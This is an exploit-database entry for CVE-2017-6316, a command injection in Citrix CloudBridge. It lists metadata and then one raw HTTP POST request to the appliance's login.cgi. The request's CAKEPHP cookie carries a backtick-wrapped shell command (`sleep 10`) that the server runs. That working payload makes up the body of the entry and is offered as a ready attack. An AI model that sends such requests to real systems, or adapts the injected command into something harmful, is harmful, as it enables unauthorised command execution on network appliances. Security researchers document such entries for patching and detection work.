EXPLOITS

Citrix CloudBridge - 'CAKEPHP' Cookie Command Injection

Author: xort
type: webapps
platform: cgi
port: 
date_added: 2017-07-19  
date_updated: 2017-07-19  
verified: 0  
codes: CVE-2017-6316  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 42346.txt  

POST /cgi-bin/login.cgi?redirect=/ HTTP/1.1
Host: 10.242.129.149
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: https://10.242.129.149/cgi-bin/login.cgi?redirect=/
Cookie: CAKEPHP=`sleep 10`
Content-Type: application/x-www-form-urlencoded
Content-Length: 13

action=logout